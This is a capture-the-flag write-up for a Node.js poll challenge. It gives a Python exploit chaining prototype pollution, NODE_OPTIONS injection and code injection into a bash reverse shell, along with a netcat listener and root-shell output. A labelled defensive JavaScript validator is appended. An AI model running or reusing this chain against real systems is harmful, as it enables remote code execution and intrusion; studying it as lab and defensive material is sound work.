Diefunction
POLL


Last updated 3 years ago


Project

Structure

poll/
├── docker
│   └── node
│       └── Dockerfile
├── docker-compose.yml
└── src
    ├── app.js
    ├── config.js
    ├── flag.txt
    ├── package.json
    ├── package-lock.json
    ├── static
    │   ├── bootstrap
    │   │   └── css
    │   │       └── bootstrap.min.css
    │   ├── css
    │   │   └── Lightbox-Gallery.css
    │   ├── img
    │   │   ├── about-bg.jpg
    │   │   ├── admin-bg.jpg
    │   │   ├── contact-bg.jpg
    │   │   ├── Fword-CTF-bakground.png
    │   │   ├── home-bg.jpg
    │   │   ├── index-bg.jpg
    │   │   ├── login-bg.png
    │   │   ├── naruto.png
    │   │   ├── register-bg.jpg
    │   │   ├── Wallpaper Subaru Natsuki, Zero, 4K, 5K, Art 6507310401.jpg
    │   │   ├── wp2349778-kuroko-tetsuya-wallpapers.jpg
    │   │   └── wp3754599-hinata-shy-wallpapers.jpg
    │   └── js
    │       └── clean-blog.js
    └── views
        ├── admin.ejs
        ├── animes.ejs
        ├── home.ejs
        ├── index.ejs
        ├── login.ejs
        ├── register.ejs
        └── update.ejs

Solution

Install pip

sudo apt install python3-pip

Install requests

python3 -m pip install requests

Start a Netcat listener

nc -lnvp 8443

Exploit (save as exploit.py)

from requests import Session

host = '127.0.0.1'
port = '1234'

session = Session()
session.proxies = {'http': '127.0.0.1:8080'}

payload = {
    'username':'diefunction',
    'password': 'diefunction',
    'anime': 'Bleach'
}
session.post(f'http://{host}:{port}/register', json = payload)

payload = {
    'username':'diefunction',
    'password': 'diefunction'
}
session.post(f'http://{host}:{port}/login', json = payload)

payload = {
    'constructor[name][constructor][lucky]': '1',
    'luck': '1'
}
session.get(f'http://{host}:{port}/update', params = payload)

payload = {
    'envname': 'NODE_OPTIONS',
    'env': '--require /proc/self/environ',
    'path': '/data/config.js'
}
session.post(f'http://{host}:{port}/admin', json = payload)

code = "'';require('child_process').execSync('/bin/bash -c \\\'/bin/bash -i >& /dev/tcp/172.17.0.1/8443 0>&1\\\'');//"
payload = {
    'envname': 'NODE_VERSION',
    'env': f'{code}',
    'path': '/data/package.json'
}
session.post(f'http://{host}:{port}/admin', json = payload)

Run the script

python3 exploit.py

Output

writeup@ubuntu:~/Desktop/athack-ctf/poll$ nc -lnvp 8443
Listening on 0.0.0.0 8443
Connection received on 172.18.0.3 46818
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@c56a8d29b3fb:/data# cat /flag.txt
cat /flag.txt
AtHackCTF{Dummy_Flag}
root@c56a8d29b3fb:/data# 
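
A defender's view of the requests in the script above, as an added example that is not part of the original writeup or the challenge source: a check that rejects nested `constructor`/`__proto__`/`prototype` keys in parsed input, and an allowlist for the `envname`/`env` pair sent to `/admin`. The function names, the `ENV_POLICY` allowlist and the sample objects are assumptions constructed for illustration, and the nested object shape assumes a bracket-notation query parser.

```javascript
// Added defensive example: hypothetical helper names, constructed sample input.

// Keys that let a nested merge or assignment reach shared prototypes.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Return the dotted path of every forbidden key in a parsed query/body object.
function findPollutionKeys(value, path = []) {
  if (value === null || typeof value !== 'object') return [];
  const hits = [];
  for (const key of Object.keys(value)) {            // own keys only
    const here = [...path, key];
    if (FORBIDDEN_KEYS.has(key)) hits.push(here.join('.'));
    hits.push(...findPollutionKeys(value[key], here));
  }
  return hits;
}

// Assumed policy: the admin endpoint may set only these variables, and each
// value must match a strict pattern. NODE_OPTIONS is deliberately absent.
const ENV_POLICY = { NODE_VERSION: /^\d+\.\d+\.\d+$/ };

// Return null when the update is acceptable, otherwise a rejection reason.
function validateEnvUpdate(body, policy = ENV_POLICY) {
  const { envname, env } = body || {};
  if (typeof envname !== 'string' || typeof env !== 'string') return 'bad types';
  // hasOwnProperty keeps names such as "constructor" from matching via the prototype.
  if (!Object.prototype.hasOwnProperty.call(policy, envname)) return 'name not allowed';
  if (!policy[envname].test(env)) return 'value rejected';
  return null;
}

// Constructed inputs shaped like the /update and /admin requests in the script.
const SAMPLE_QUERY = JSON.parse(
  '{"constructor":{"name":{"constructor":{"lucky":"1"}}},"luck":"1"}');
const SAMPLE_ADMIN_1 = { envname: 'NODE_OPTIONS', env: '--require /proc/self/environ' };
const SAMPLE_ADMIN_2 = { envname: 'NODE_VERSION', env: "'';require('child_process')//" };
const SAMPLE_ADMIN_OK = { envname: 'NODE_VERSION', env: '18.19.0' };

console.log(findPollutionKeys(SAMPLE_QUERY));
console.log(validateEnvUpdate(SAMPLE_ADMIN_1), validateEnvUpdate(SAMPLE_ADMIN_2),
            validateEnvUpdate(SAMPLE_ADMIN_OK));
```

The `path` field of the `/admin` request is not covered here; it would need its own allowlist of writable files.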